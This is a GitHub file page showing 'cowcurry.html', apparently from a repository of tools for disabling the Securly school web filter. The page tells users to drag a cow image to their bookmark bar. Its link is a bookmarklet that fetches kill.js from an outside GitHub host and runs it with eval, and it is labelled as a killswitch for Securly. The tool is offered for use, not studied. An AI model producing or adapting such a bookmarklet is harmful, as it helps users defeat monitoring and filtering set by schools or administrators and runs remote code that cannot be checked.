forked from zek-c/Securly-Kill-V111
-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathcowcurry.html
36 lines (36 loc) · 1.34 KB
/
cowcurry.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<!DOCTYPE html>
<html>
<head>
<title>Pull the Plug on Securly</title>
<link rel="icon" href="https://raw.githubusercontent.com/Epicminer256/Securascramble/main/IMG/favicon.ico">
<style type="text/css">
body {
color: #000;
font-family: 'Roboto', monospace;
}
#cow{
display: block;
background-image: url("https://github.com/Epicminer256/Securascramble/blob/main/IMG/background.gif?raw=true");
background-position: center;
background-repeat: no-repeat;
width: 100%;
height: 280px;
font-size: 0px;
}
p {
font-size: 30px;
margin: 0;
padding: 20px;
text-align: center;
}
</style>
</head>
<body>
<p>Drag this cow to your bookmarkbar (Use Ctrl+Shift+B to show/hide bookmarkbar)</p>
<a onclick="event.preventDefault();alert('Drag and drop me to you bookmark bar, don\'t click me!')" href="javascript:fetch('https://raw.githubusercontent.com/Epicminer256/Securascramble/main/kill.js').then(r => r.text()).then(r => eval(r))">
<div id="cow">
Killswitch for Securly
</div>
</a>
</body>
</html>